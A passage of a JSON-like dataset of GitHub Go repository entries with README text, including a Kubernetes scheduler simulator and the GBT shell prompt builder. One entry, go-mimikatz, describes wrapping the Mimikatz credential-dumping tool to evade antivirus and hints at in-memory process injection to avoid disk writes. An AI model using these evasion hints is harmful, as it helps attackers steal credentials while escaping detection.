\u652f\u4ed8\u6216\u9000\u6b3e\u8fd4\u56de\u6210\u529f\u4fe1\u606f\nreturn wxpay.Notifies{}.OK()\n\n// \u652f\u4ed8\u6216\u9000\u6b3e\u8fd4\u56de\u5931\u8d25\u4fe1\u606f\nreturn wxpay.Notifies{}.NotOK(\"\u652f\u4ed8\u5931\u8d25\u6216\u9000\u6b3e\u5931\u8d25\u4e86\")\n\n```\n\n![objcoding](https://raw.githubusercontent.com/objcoding/objcoding.github.io/master/images/official_accounts.jpg)\n\n\n## License\nMIT license\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "limetext/backend", "link": "https://github.com/limetext/backend", "tags": ["golang", "editor"], "stars": 526, "description": "Backend for LimeText", "lang": "Go", "repo_lang": "", "readme": "# lime-backend\n[![Build Status](https://travis-ci.org/limetext/backend.svg?branch=master)](https://travis-ci.org/limetext/backend)\n[![Coverage Status](https://img.shields.io/coveralls/limetext/backend.svg?branch=master)](https://coveralls.io/r/limetext/backend?branch=master)\n[![Go Report Card](https://goreportcard.com/badge/github.com/limetext/backend)](https://goreportcard.com/report/github.com/limetext/backend)\n[![GoDoc](https://godoc.org/github.com/limetext/backend?status.svg)](https://godoc.org/github.com/limetext/backend)\n\n[![Bountysource Bounties](https://www.bountysource.com/badge/team?team_id=8742&style=bounties_received)](https://www.bountysource.com/teams/limetext/issues?utm_source=limetext&utm_medium=shield&utm_campaign=bounties_received)\n[![Bountysource Raised](https://www.bountysource.com/badge/team?team_id=8742&style=raised)](https://www.bountysource.com/teams/limetext?utm_source=limetext&utm_medium=shield&utm_campaign=raised)\n\n[![Gitter](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/limetext/lime)\n\nThis is the backend code for Lime. For more information about the project, please see [limetext/lime](https://github.com/limetext/lime).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "client9/ipcat", "link": "https://github.com/client9/ipcat", "tags": [], "stars": 526, "description": "Categorization of IP Addresses", "lang": "Go", "repo_lang": "", "readme": "**ipcat**: datasets for categorizing IP addresses.\n\nArchived in 2023. Please fork and edit as you wish. It's MIT now. Onward -- nickg\n\n---\n\nThis is a list of IPv4 addresses that correspond to datacenters,\nco-location centers, shared and virtual webhosting providers. In\nother words, ip addresses that end web consumers should not be using.\n\nStatistics\n------------------------\n\nCheck out the new [datacenter stats](/datacenters-stats.csv)\n\nWhat is the file format?\n-------------------------\n\n\n\nStandard CSV with ip-start, ip-end (inclusive, in dot-notation),\nname of provider, url of provider. IP ranges are non-overlapping,\nand in sorted order.\n\nWhy is hosting provider XXX is missing?\n---------------------------------------\n\nIt might not be. Many providers are resellers of another and will be\nincluded under another name or ip range.\n\nAlso, as of 16-Oct-2011, many locations from Africa, Latin\nAmerica, Korea and Japan are missing.\n\nOr, it might just be missing. Please let us know!\n\nWhy GitHub + CSV?\n-------------------------\n\nThe goal of the file format and the use of github was designed to make\nit really easy for other to send patches or additions. It also provides\nan easy way of keeping track of changes.\n\nHow is this generated?\n-------------------------\n\nManually from users like you, and automatically via proprietary\ndiscovery algorithms.\n\nWho made this?\n-------------------------\n\nNick Galbreath. See more at http://www.client9.com/\n\n", "readme_type": "markdown", "hn_comments": "For the most part, this seemed like an interesting blog post, but toward the end, it came across as a thinly veiled advertisement for this iOS framework. My apologies if I have misconstrued this, but the title is misleading. If you're advertising, say so rather than trying to disguise it.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kubernetes-sigs/kube-scheduler-simulator", "link": "https://github.com/kubernetes-sigs/kube-scheduler-simulator", "tags": ["k8s-sig-scheduling"], "stars": 524, "description": "A web-based simulator for the Kubernetes scheduler", "lang": "Go", "repo_lang": "", "readme": "# Kubernetes scheduler simulator\n\nHello world. Here is Kubernetes scheduler simulator.\n\nNowadays, the scheduler is configurable/extendable in the multiple ways:\n- configure with [KubeSchedulerConfiguration](https://kubernetes.io/docs/reference/scheduling/config/)\n- add Plugins of [Scheduling Framework](https://kubernetes.io/docs/concepts/scheduling-eviction/scheduling-framework/)\n- add [Extenders](https://github.com/kubernetes/enhancements/tree/5320deb4834c05ad9fb491dcd361f952727ece3e/keps/sig-scheduling/1819-scheduler-extender)\n- etc...\n\nBut, unfortunately, not all configurations/expansions yield good results.\nThose who customize the scheduler need to make sure their scheduler is working as expected, and doesn't have an unacceptably negative impact on the scheduling.\n\nIn real Kubernetes, we cannot know the results of scheduling in detail without reading the logs, which usually requires privileged access to the control plane.\nThat's why we are developing a simulator for kube-scheduler -- you can try out the behavior of the scheduler with web UI while checking which plugin made what decision for which Node.\n\n## Simulator's architecture\n\nWe have several components:\n- Simulator (in `/simulator`)\n- Web UI (in `/web`)\n- Coming soon... :) (see [./keps](./keps) to see some nice ideas we're working on)\n\n### Simulator\n\nSimulator internally has kube-apiserver, scheduler, and HTTP server.\n\nYou can create any resources by communicating with kube-apiserver via kubectl, k8s client library, or web UI.\n\nSee the following docs to know more about simulator:\n- [how-it-works.md](simulator/docs/how-it-works.md): describes about how the simulator works.\n- [kube-apiserver.md](simulator/docs/kube-apiserver.md): describe about kube-apiserver in simulator. (how you can configure and access)\n- [api.md](simulator/docs/api.md): describes about HTTP server the simulator has.\n\n### Web UI\n\nWeb UI is one of the clients of simulator, but it's optimized for simulator.\n\nFrom the web, you can create/edit/delete these resources to simulate a cluster.\n\n- Nodes\n- Pods\n- Persistent Volumes\n- Persistent Volume Claims\n- Storage Classes\n- Priority Classes\n\n![list resources](simulator/docs/images/resources.png)\n\nYou can create resources with yaml file as usual.\n\n![create node](simulator/docs/images/create-node.png)\n\nAnd, after pods are scheduled, you can see the results of\n\n- Each Filter plugins\n- Each Score plugins\n- Final score (normalized and applied Plugin Weight)\n\n![result](simulator/docs/images/result.jpg)\n\nYou can configure the scheduler on the simulator through KubeSchedulerConfiguration.\n\n[Scheduler Configuration | Kubernetes](https://kubernetes.io/docs/reference/scheduling/config/)\n\nYou can pass a KubeSchedulerConfiguration file via the environment variable `KUBE_SCHEDULER_CONFIG_PATH` and the simulator will start kube-scheduler with that configuration.\n\nNote: changes to any fields other than `.profiles` are disabled on simulator, since they do not affect the results of the scheduling.\n\n![configure scheduler](simulator/docs/images/schedulerconfiguration.png)\n\nIf you want to use your custom plugins as out-of-tree plugins in the simulator, please follow [this doc](simulator/docs/how-to-use-custom-plugins/README.md).\n\n## Getting started\n\nRead more about environment variables being used in simulator server\n[here.](./simulator/docs/env-variables.md)\n\n### Run simulator with Docker\n\nWe have [docker-compose.yml](docker-compose.yml) to run the simulator easily. You should install [docker](https://docs.docker.com/engine/install/) and [docker-compose](https://docker-docs.netlify.app/compose/install/) firstly.\n\nYou can use the following command.\n\n```bash\n# build the images for web frontend and simulator server, then start the containers.\nmake docker_build_and_up\n```\n\nThen, you can access the simulator with http://localhost:3000. If you want to deploy the simulator on a remote server and access it via a specific IP (e.g: like http://10.0.0.1:3000/), please make sure that you have executed `export SIMULATOR_EXTERNAL_IP=your.server.ip` before running `docker-compose up -d`.\n\nNote: Insufficient memory allocation may cause problems in building the image.\nPlease allocate enough memory in that case.\n\n### Run simulator locally\n\nYou have to run frontend, server and etcd.\n\n#### Run simulator server and etcd\n\nTo run this simulator's server, you have to install Go and etcd.\n\nYou can install etcd with [kubernetes/kubernetes/hack/install-etcd.sh](https://github.com/kubernetes/kubernetes/blob/master/hack/install-etcd.sh).\n\n```bash\ncd simulator\nmake start\n```\n\nIt starts etcd and simulator-server locally.\n\n#### Run simulator frontend\n\nTo run the frontend, please see [README.md](web/README.md) on ./web dir.\n\n## Contributing\n\nsee [CONTRIBUTING.md](CONTRIBUTING.md)\n\n## Community, discussion, contribution, and support\n\nLearn how to engage with the Kubernetes community on the [community page](http://kubernetes.io/community/).\n\nYou can reach the maintainers of this project at:\n\n- [Slack](http://slack.k8s.io/)\n- [Mailing List](https://groups.google.com/forum/#!forum/kubernetes-dev)\n\n### Code of conduct\n\nParticipation in the Kubernetes community is governed by the [Kubernetes Code of Conduct](code-of-conduct.md).\n\n[owners]: https://git.k8s.io/community/contributors/guide/owners.md\n[creative commons 4.0]: https://git.k8s.io/website/LICENSE\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "vyrus001/go-mimikatz", "link": "https://github.com/vyrus001/go-mimikatz", "tags": [], "stars": 524, "description": "A wrapper around a pre-compiled version of the Mimikatz executable for the purpose of anti-virus evasion.", "lang": "Go", "repo_lang": "", "readme": "# go-mimikatz\nA Go wrapper Mimikatz for the purpose of anti-virus evasion.\n\n# Building\ncd into the repo and run `go generate`\n\n### Notes:\n* evades windows again (as of 11/23/2021)\n* If compiled as position independent code (`-buildmode=pie`) via go 1.15 or newer, this code can be transformed via [donut](https://github.com/Binject/go-donut) and then subsequently injected into another process on the target machine (a hint for those trying to avoid disk writes during deployment)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "jtyr/gbt", "link": "https://github.com/jtyr/gbt", "tags": ["prompt", "zsh", "go", "shell", "ssh", "docker", "vagrant", "mysql", "termux", "screen", "sudo", "su", "kubectl", "python", "powershell", "gcp", "aws", "azure"], "stars": 524, "description": "Highly configurable prompt builder for Bash, ZSH and PowerShell written in Go.", "lang": "Go", "repo_lang": "", "readme": "Go Bullet Train (GBT)\n=====================\n\nHighly configurable prompt builder for Bash, ZSH and PowerShell written in Go.\nIt's inspired by the [Oh My ZSH](https://github.com/robbyrussell/oh-my-zsh)\n[Bullet Train](https://github.com/caiogondim/bullet-train.zsh) theme but runs\nsignificantly faster.\n\n![Demo](https://raw.githubusercontent.com/jtyr/gbt/master/images/demo.gif \"Demo\")\n\nGBT comes with an interesting feature called\n[prompt forwarding](#prompt-forwarding) which allows to forward user-defined\nprompt to a remote machine and have the same-looking prompt across all machines\nvia SSH but also in Docker, Kubectl, Vagrant, MySQL or in Screen without the\nneed to install anything remotely.\n\n![Prompt forwarding demo](https://raw.githubusercontent.com/jtyr/gbt/master/images/prompt_forwarding.gif \"Prompt forwarding demo\")\n\nAll the above works well on Linux (Terminator, Konsole, Gnome Terminal), Mac\n(Terminal, iTerm), Android (Termux) and Windows (PowerShell, Windows Terminal).\n\n[![Release](https://img.shields.io/github/release/jtyr/gbt.svg)](https://github.com/jtyr/gbt/releases)\n[![Build status](https://travis-ci.org/jtyr/gbt.svg?branch=master)](https://travis-ci.org/jtyr/gbt)\n[![Coverage Status](https://coveralls.io/repos/github/jtyr/gbt/badge.svg?branch=master)](https://coveralls.io/github/jtyr/gbt?branch=master)\n[![Packagecloud](https://img.shields.io/badge/%E2%98%81-Packagecloud-707aed.svg)](https://packagecloud.io/gbt/release)\n\n\nTable of contents\n-----------------\n\n- [Setup](#setup)\n - [Installation](#installation)\n - [Arch Linux](#arch-linux)\n - [CentOS/RHEL](#centosrhel)\n - [Ubuntu/Debian](#ubuntudebian)\n - [Mac](#mac)\n - [Windows](#windows)\n - [Android](#android)\n - [From the source code](#from-the-source-code)\n - [Activation](#activation)\n - [Fonts and colors](#fonts-and-colors)\n- [Configuration](#configuration)\n - [Colors](#colors)\n - [Formatting](#formatting)\n - [Train variables](#train-variables)\n - [Cars variables](#cars-variables)\n - [`Aws` car](#aws-car)\n - [`Azure` car](#azure-car)\n - [`Custom` car](#custom-car)\n - [`Dir` car](#dir-car)\n - [`ExecTime` car](#exectime-car)\n - [`Gcp` car](#gcp-car)\n - [`Git` car](#git-car)\n - [`Hostname` car](#hostname-car)\n - [`Kubectl` car](#kubectl-car)\n - [`Os` car](#os-car)\n - [`PyVirtEnv` car](#pyvirtenv-car)\n - [`Sign` car](#sign-car)\n - [`Status` car](#status-car)\n - [`Time` car](#time-car)\n- [Benchmark](#benchmark)\n- [Prompt forwarding](#prompt-forwarding)\n - [Principle](#principle)\n - [Additional settings](#additional-settings)\n - [MacOS users](#macos-users)\n - [Limitations](#limitations)\n- [TODO](#todo)\n- [Author](#author)\n- [License](#license)\n\n\nSetup\n-----\n\nIn order to setup GBT on your machine, you have to [install](#installation) it,\n[activate](#activation) it and setup a special [font](#fonts-and-colors) in your\nterminal (optional).\n\n### Installation\n\n#### Arch Linux\n\n```shell\nyaourt -S gbt\n```\n\nOr install `gbt-git` if you would like to run the latest greatest from the\n`master` branch.\n\n#### CentOS/RHEL\n\nPackages hosted by [Packagecloud](https://packagecloud.io/gbt/release):\n\n```shell\necho '[gbt]\nname=GBT YUM repo\nbaseurl=https://packagecloud.io/gbt/release/el/7/$basearch\ngpgkey=https://packagecloud.io/gbt/release/gpgkey\n https://packagecloud.io/gbt/release/gpgkey/gbt-release-4C6E79EFF45439B6.pub.gpg\ngpgcheck=1\nrepo_gpgcheck=1' | sudo tee /etc/yum.repos.d/gbt.repo >/dev/null\nsudo yum install gbt\n```\n\nUse the exact repository definition from above for all RedHat-based\ndistribution regardless its version.\n\n#### Ubuntu/Debian\n\nPackages hosted by [Packagecloud](https://packagecloud.io/gbt/release):\n\n```shell\ncurl -L https://packagecloud.io/gbt/release/gpgkey | sudo apt-key add -\necho 'deb https://packagecloud.io/gbt/release/ubuntu/ xenial main' | sudo tee /etc/apt/sources.list.d/gbt.list >/dev/null\nsudo apt-get update\nsudo apt-get install gbt\n```\n\nUse the exact repository definition from above for all Debian-based\ndistribution regardless its version.\n\n#### Mac\n\nUsing [`brew`](https://brew.sh):\n\n```shell\nbrew tap jtyr/repo\nbrew install gbt\n```\nOr install `gbt-git` if you would like to run the latest greatest from the\n`master` branch:\n\n```shell\nbrew tap jtyr/repo\nbrew install --HEAD gbt-git\n```\n\n#### Windows\n\nUsing [`choco`](https://chocolatey.org):\n\n```powershell\nchoco install gbt\n```\n\nUsing [`scoop`](https://scoop.sh):\n\n```powershell\nscoop install gbt\n```\n\nOr manually by copying the `gbt.exe` file into a directory listed in the `PATH`\nenvironment variable (e.g. `C:\\Windows\\system32`).\n\n#### Android\n\nInstall [Termux](https://termux.com) from [Google Play Store](https://play.google.com/store/apps/details?id=com.termux)\nand then type this in the Termux app:\n\n```shell\napt update\napt install gbt\n```\n\n#### From the source code\n\nMake sure [Go](https://golang.org) is installed and then run the following on\nLinux and Mac:\n\n```shell\nmkdir ~/go\nexport GOPATH=~/go\nexport PATH=\"$PATH:$GOPATH/bin\"\ngo get github.com/jtyr/gbt/cmd/gbt\n```\n\nOr the following on Windows using PowerShell:\n\n```powershell\nmkdir ~/go\n$Env:GOPATH = '~/go'\n$Env:PATH = \"~/go/bin;$Env:PATH\"\ngo get github.com/jtyr/gbt/cmd/gbt\n```\n\n---\n\n### Activation\n\nAfter GBT is installed, it can be activated by calling it from the shell prompt\nvariable:\n\n```shell\n# For Bash\nPS1='$(gbt $?)'\n\n# For ZSH\nPROMPT='$(gbt $?)'\n```\n\nIf you are using ZSH together with some shell framework (e.g. [Oh My\nZSH](https://github.com/robbyrussell/oh-my-zsh)), your shell is processing a\nfair amount of shell scripts upon ever prompt appearance. You can speed up your\nshell by removing the framework dependency from your configuration and replacing\nit with GBT and a [simple ZSH\nconfiguration](https://gist.github.com/jtyr/be0e6007bd22c9d51e8702a70430d116#file-zshrc-L1-L43).\nCombining pure ZSH configuration with GBT will provide the best possible\nperformance for your shell.\n\nTo activate GBT in PowerShell, run the following in the console or store it to\nthe PowerShell profile file (`echo $profile`):\n\n```powershell\nfunction prompt {\n $rc = [int]$(-Not $?)\n $Env:GBT_SHELL = 'plain'\n $Env:PWD = get-location\n $Env:GBT_CAR_CUSTOM_EXECUTOR='powershell.exe'\n $Env:GBT_CAR_CUSTOM_EXECUTOR_PARAM='-Command'\n $gbt_output = & @({gbt $rc},{gbt.exe $rc})[$PSVersionTable.PSVersion.Major -lt 6 -or $IsWindows] | Out-String\n $gbt_output = $gbt_output -replace ([Environment]::NewLine + '$'), ''\n Write-Host -NoNewline $gbt_output\n return [char]0\n}\n# Needed only on Windows\n[console]::InputEncoding = [console]::OutputEncoding = New-Object System.Text.UTF8Encoding\n```\n\n---\n\n### Fonts and colors\n\nAlthough GBT can be configured to use only ASCII characters (see\n[`basic`](blob/master/themes/basic.sh) theme), the default configuration uses\nsome UTF-8 characters which require special font. In order to display all\ncharacters of the default prompt correctly, the shell should support UTF-8 and\n[Nerd](https://github.com/ryanoasis/nerd-fonts) fonts (or at least the\n[DejaVuSansMono\nNerd](https://github.com/ryanoasis/nerd-fonts/tree/master/patched-fonts/DejaVuSansMono/Regular/complete)\nfont) should be installed. On Linux, you can install it like this:\n\n```shell\nmkdir ~/.fonts\ncurl -L -o ~/.fonts/DejaVuSansMonoNerdFontCompleteMono.ttf https://github.com/ryanoasis/nerd-fonts/raw/master/patched-fonts/DejaVuSansMono/Regular/complete/DejaVu%20Sans%20Mono%20Nerd%20Font%20Complete%20Mono.ttf\nfc-cache\n```\n\nOn Mac, it can be installed via `brew`:\n\n```shell\nbrew tap homebrew/cask-fonts\nbrew install --cask font-dejavu-sans-mono-nerd-font\n```\n\nOn Windows, it can be installed via `choco`:\n\n```powershell\nchoco install font-nerd-DejaVuSansMono\n```\n\nOr via `scoop`:\n\n```powershell\nscoop bucket add nerd-fonts\nscoop install DejaVuSansMono-NF\n```\n\nOr just [download](https://github.com/ryanoasis/nerd-fonts/raw/master/patched-fonts/DejaVuSansMono/Regular/complete/DejaVu%20Sans%20Mono%20Nerd%20Font%20Complete%20Mono%20Windows%20Compatible.ttf)\nthe font, open it and then install it.\n\nOnce the font is installed, it has to be set in the terminal application to\nrender all prompt characters correctly. Search for the font name `DejaVuSansMono\nNerd Font Mono` on Linux and Mac and `DejaVuSansMono NF` on Windows.\n\nIn order to have the Nerd font in Termux on Android, you have to install\n[Termux:Styling](https://play.google.com/store/apps/details?id=com.termux.styling)\napplication. Then longpress the terminal screen and select `MORE...` \u2192 `Style`\n\u2192 `CHOOSE FONT` and there choose the `DejaVu` font.\n\nSome Unix terminals might not use 256 color palette by default. In such case try\nto set the following:\n\n```shell\nexport TERM='xterm-256color'\n```\n\n\nConfiguration\n-------------\n\nThe prompt (train) is assembled from several elements (cars). The look and\nbehavior of whole train as well as each car can be influenced by a set of\nenvironment variables. To set the environment variable, use `export` in the\nLinux and Mac shell and `$Env:` on Windows.\n\n\n### Colors\n\nThe value of all `_BG` and `_FG` variables defines the background and\nforeground color of the particular element. The value of the color can be\nspecified in 3 ways:\n\n#### Color name\n\nOnly a limited number of named colors is supported:\n\n- ![black](https://via.placeholder.com/10/000000/000000?text=+) `black`\n- ![red](https://via.placeholder.com/10/800000/000000?text=+) `red`\n- ![green](https://via.placeholder.com/10/008000/000000?text=+) `green`\n- ![yellow](https://via.placeholder.com/10/808000/000000?text=+) `yellow`\n- ![blue](https://via.placeholder.com/10/000080/000000?text=+) `blue`\n- ![magenta](https://via.placeholder.com/10/800080/000000?text=+) `magenta`\n- ![cyan](https://via.placeholder.com/10/008080/000000?text=+) `cyan`\n- ![light_gray](https://via.placeholder.com/10/c0c0c0/000000?text=+) `light_gray`\n- ![dark_gray](https://via.placeholder.com/10/808080/000000?text=+) `dark_gray`\n- ![light_red](https://via.placeholder.com/10/ff0000/000000?text=+) `light_red`\n- ![light_green](https://via.placeholder.com/10/00ff00/000000?text=+) `light_green`\n- ![light_green](https://via.placeholder.com/10/ffff00/000000?text=+) `light_yellow`\n- ![light_blue](https://via.placeholder.com/10/0000ff/000000?text=+) `light_blue`\n- ![light_magenta](https://via.placeholder.com/10/ff00ff/000000?text=+) `light_magenta`\n- ![light_cyan](https://via.placeholder.com/10/00ffff/000000?text=+) `light_cyan`\n- ![white](https://via.placeholder.com/10/ffffff/000000?text=+) `white`\n- `default` (default color of the terminal)\n\nExamples:\n\n```shell\n# Set the background color of the `Dir` car to red\nexport GBT_CAR_DIR_BG='red'\n# Set the foreground color of the `Dir` car to white\nexport GBT_CAR_DIR_FG='white'\n```\n\n#### Color number\n\nColor can also by expressed by a single number in the range from `0` to\n`255`. The color of each number in that range is visible in the 256-color\nlookup table on\n[Wikipedia](https://en.wikipedia.org/wiki/ANSI_escape_code#8-bit). The named\ncolors described above are the first 16 numbers from the lookup table.\n\nExamples:\n\n```shell\n# Set the background color of the `Dir` car to red\nexport GBT_CAR_DIR_BG='1'\n# Set the foreground color of the `Dir` car to white\nexport GBT_CAR_DIR_FG='15'\n```\n\n#### RGB color\n\nArbitrary color can be expressed in the form of RGB triplet.\n\nExamples:\n\n```shell\n# Set the background color of the `Dir` car to red\nexport GBT_CAR_DIR_BG='170;0;0'\n# Set the foreground color of the `Dir` car to white\nexport GBT_CAR_DIR_FG='255;255;255'\n```\n\n#### Color scheme resistance\n\nGBT is using [8-bit color\npalette](https://en.wikipedia.org/wiki/ANSI_escape_code#8-bit) to color\nindividual cars of the train. First 16 colors (Standart and High-intensity\ncolors) of the palette are prone to a change if the terminal is using some color\nscheme (e.g.\n[Solarized](https://en.wikipedia.org/wiki/Solarized_(color_scheme))). That means\nthat if one GBT train uses mixture of the first 16 and the remaining 240 colors,\nthe look might be inconsistent because some of the colors might change\n(depending on the color scheme) and some not. Luckily the first 16 colors can be\nfound in the remaining 240 colors and therefore GBT can automatically convert\nthe first 16 colors into higher colors which provides consistent look regardless\nthe color scheme. This works automatically for [color names](#color-name) as\nwell as for [color numbers](#color-number). If needed, the automatic conversion\ncan be disabled with the following variable:\n\n```shell\nexport GBT_FORCE_HIGHER_COLORS='0'\n```\n\n\n### Formatting\n\nFormatting is done via `_FM` variables. The possible values are:\n\n- `normal`\n\n Makes the text normal.\n\n- `dim`\n\n Makes the text dim.\n\n- `bold`\n\n Makes the text bold. Not all font characters have variant for bold formatting.\n\n- `underline`\n\n Makes the text underlined.\n\n- `blink`\n\n Makes the text to blink.\n\n- `invert`\n\n Makes the text color inverted.\n\n- `hide`\n\n Makes the text hidden.\n\n- `none`\n\n No formatting applied.\n\n Multiple formattings can be combined into comma-separated list.\n\n Examples:\n\n ```shell\n # Set the directory name to be bold\n export GBT_CAR_DIR_FM='bold'\n # Set the directory name to be bold and underlined\n export GBT_CAR_DIR_FM='bold,underline'\n ```\n\n\n### Train variables\n\n- `GBT_CARS='Status, Os, Hostname, Dir, Git, Sign'`\n\n List of cars used in the train.\n\n To add a new car into the train, the whole variable must be redefined. For\n example in order to add the `Time` car into the default set of cars between\n the `Os` and `Hostname` car, the variable should look like this:\n\n ```shell\n export GBT_CARS='Status, Os, Time, Hostname, Dir, Git, Sign'\n ```\n\n- `GBT_RCARS='Time'`\n\n The same like `GBT_CARS` but for the right hand side prompt.\n\n ```shell\n # Add the Custom car into the right hand site car to have the separator visible\n export GBT_RCARS='Custom, Time'\n # Make the Custom car to be invisible (zero length text)\n export GBT_CAR_CUSTOM_BG='default'\n export GBT_CAR_CUSTOM_FORMAT=''\n # Show only time\n export GBT_CAR_TIME_FORMAT=' {{ Time }} '\n # Set the right hand side prompt (ZSH only)\n RPROMPT='$(gbt -right)'\n ```\n\n- `GBT_SEPARATOR='\ue0b0'`\n\n Character used to separate cars in the train.\n\n- `GBT_RSEPARATOR='\ue0b2'`\n\n The same like `GBT_SEPARATOR` but for the right hand side prompt.\n\n- `GBT_CAR_BG`\n\n Background color inherited by the top background color variable of every car.\n That allows to set the background color of all cars via single variable.\n\n- `GBT_CAR_FG`\n\n Foreground color inherited by the top foreground color variable of every car.\n That allows to set the foreground color of all cars via single variable.\n\n- `GBT_CAR_FM`\n\n Formatting inherited by the top formatting variable of every car. That allows\n to set the formatting of all cars via single variable.\n\n- `GBT_BEGINNING_BG='default'`\n\n Background color of the text shown at the beginning of the train.\n\n- `GBT_BEGINNING_FG='default'`\n\n Foreground color of the text shown at the beginning of the train.\n\n- `GBT_BEGINNING_FM='none'`\n\n Formatting of the text shown at the beginning of the train.\n\n- `GBT_BEGINNING_TEXT=''`\n\n Text shown at the beginning of the train.\n\n- `GBT_SHELL`\n\n Indicates which shell is used. The value can be either `zsh`, `bash` or\n `plain`. By default, the value is extracted from the `$SHELL` environment\n variable. Set this variable to `bash` if your default shell is ZSH but you\n want to test GBT in Bash:\n\n ```shell\n export GBT_SHELL='bash'\n bash\n ```\n If set to `plain`, no shell-specific decoration is included in the output\n text. That's suitable for displaying the GBT-generated string in the console\n output.\n\n- `GBT_DEBUG='0'`\n\n Shows more verbose output if some of the car modules cannot be imported.\n\n\n### Cars variables\n\n#### `Aws` car\n\nCar that displays information about the local [AWS](https://aws.amazon.com/)\nconfiguration.\n\n- `GBT_CAR_AWS_BG='166'`\n\n Background color of the car.\n\n- `GBT_CAR_AWS_FG='white'`\n\n Foreground color of the car.\n\n- `GBT_CAR_AWS_FM='none'`\n\n Formatting of the car.\n\n- `GBT_CAR_AWS_FORMAT=' {{ Icon }} {{ Project }} '`\n\n Format of the car.\n\n- `GBT_CAR_AWS_ICON_BG`\n\n Background color of the `{{ Icon }}` element.\n\n- `GBT_CAR_AWS_ICON_FG`\n\n Foreground color of the `{{ Icon }}` element.\n\n- `GBT_CAR_AWS_ICON_FM`\n\n Formatting of the `{{ Icon }}` element.\n\n- `GBT_CAR_AWS_ICON_TEXT='\uf52d'`\n\n Text content of the `{{ Icon }}` element.\n\n- `GBT_CAR_AWS_PROFILE_BG`\n\n Background color of the `{{ Profile }}` element.\n\n- `GBT_CAR_AWS_PROFILE_FG`\n\n Foreground color of the `{{ Profile }}` element.\n\n- `GBT_CAR_AWS_PROFILE_FM`\n\n Formatting of the `{{ Profile }}` element.\n\n- `GBT_CAR_AWS_PROFILE_TEXT`\n\n Text content of the `{{ Profile }}` element specifying the configured profile.\n\n- `GBT_CAR_AWS_REGION_BG`\n\n Background color of the `{{ Region }}` element.\n\n- `GBT_CAR_AWS_REGION_FG`\n\n Foreground color of the `{{ Region }}` element.\n\n- `GBT_CAR_AWS_REGION_FM`\n\n Formatting of the `{{ Region }}` element.\n\n- `GBT_CAR_AWS_REGION_TEXT`\n\n Text content of the `{{ Region }}` element specifying the configured region.\n\n- `GBT_CAR_AWS_DISPLAY`\n\n Whether to display this car if it's in the list of cars (`GBT_CARS`).\n\n- `GBT_CAR_AWS_WRAP='0'`\n\n Whether to wrap the prompt line in front of this car.\n\n- `GBT_CAR_AWS_SEP_TEXT`\n\n Text content of the separator for this car.\n\n- `GBT_CAR_AWS_SEP_BG`\n\n Background color of the separator for this car.\n\n- `GBT_CAR_AWS_SEP_FG`\n\n Foreground color of the separator for this car.\n\n- `GBT_CAR_AWS_SEP_FM`\n\n Formatting of the separator for this car.\n\n\n#### `Azure` car\n\nCar that displays information about the local [Azure](https://azure.microsoft.com/)\nconfiguration.\n\n- `GBT_CAR_AZURE_BG='32'`\n\n Background color of the car.\n\n- `GBT_CAR_AZURE_FG='white'`\n\n Foreground color of the car.\n\n- `GBT_CAR_AZURE_FM='none'`\n\n Formatting of the car.\n\n- `GBT_CAR_AZURE_FORMAT=' {{ Icon }} {{ Subscription }} '`\n\n Format of the car.\n\n- `GBT_CAR_AZURE_ICON_BG`\n\n Background color of the `{{ Icon }}` element.\n\n- `GBT_CAR_AZURE_ICON_FG`\n\n Foreground color of the `{{ Icon }}` element.\n\n- `GBT_CAR_AZURE_ICON_FM`\n\n Formatting of the `{{ Icon }}` element.\n\n- `GBT_CAR_AZURE_ICON_TEXT='\ufd03'`\n\n Text content of the `{{ Icon }}` element.\n\n- `GBT_CAR_AZURE_CLOUD_BG`\n\n Background color of the `{{ Cloud }}` element.\n\n- `GBT_CAR_AZURE_CLOUD_FG`\n\n Foreground color of the `{{ Cloud }}` element.\n\n- `GBT_CAR_AZURE_CLOUD_FM`\n\n Formatting of the `{{ Cloud }}` element.\n\n- `GBT_CAR_AZURE_CLOUD_TEXT`\n\n Text content of the `{{ Cloud }}` element specifying the configured cloud.\n\n- `GBT_CAR_AZURE_SUBSCRIPTION_BG`\n\n Background color of the `{{ Subscription }}` element.\n\n- `GBT_CAR_AZURE_SUBSCRIPTION_FG`\n\n Foreground color of the `{{ Subscription }}` element.\n\n- `GBT_CAR_AZURE_SUBSCRIPTION_FM`\n\n Formatting of the `{{ Subscription }}` element.\n\n- `GBT_CAR_AZURE_SUBSCRIPTION_TEXT`\n\n Text content of the `{{ Subscription }}` element specifying the configured\n subscription.\n\n- `GBT_CAR_AZURE_USERNAME_BG`\n\n Background color of the `{{ UserName }}` element.\n\n- `GBT_CAR_AZURE_USERNAME_FG`\n\n Foreground color of the `{{ UserName }}` element.\n\n- `GBT_CAR_AZURE_USERNAME_FM`\n\n Formatting of the `{{ UserName }}` element.\n\n- `GBT_CAR_AZURE_USERNAME_TEXT`\n\n Text content of the `{{ UserName }}` element specifying the configured user\n name.\n\n- `GBT_CAR_AZURE_USERTYPE_BG`\n\n Background color of the `{{ UserType }}` element.\n\n- `GBT_CAR_AZURE_USERTYPE_FG`\n\n Foreground color of the `{{ UserType }}` element.\n\n- `GBT_CAR_AZURE_USERTYPE_FM`\n\n Formatting of the `{{ UserType }}` element.\n\n- `GBT_CAR_AZURE_USERTYPE_TEXT`\n\n Text content of the `{{ UserType }}` element specifying the configured user\n type.\n\n- `GBT_CAR_AZURE_STATE_BG`\n\n Background color of the `{{ State }}` element.\n\n- `GBT_CAR_AZURE_STATE_FG`\n\n Foreground color of the `{{ State }}` element.\n\n- `GBT_CAR_AZURE_STATE_FM`\n\n Formatting of the `{{ State }}` element.\n\n- `GBT_CAR_AZURE_STATE_TEXT`\n\n Text content of the `{{ State }}` element specifying the configured\n subscription state.\n\n- `GBT_CAR_AZURE_DEFAULTS_GROUP_BG`\n\n Background color of the `{{ DefaultsGroup }}` element.\n\n- `GBT_CAR_AZURE_DEFAULTS_GROUP_FG`\n\n Foreground color of the `{{ DefaultsGroup 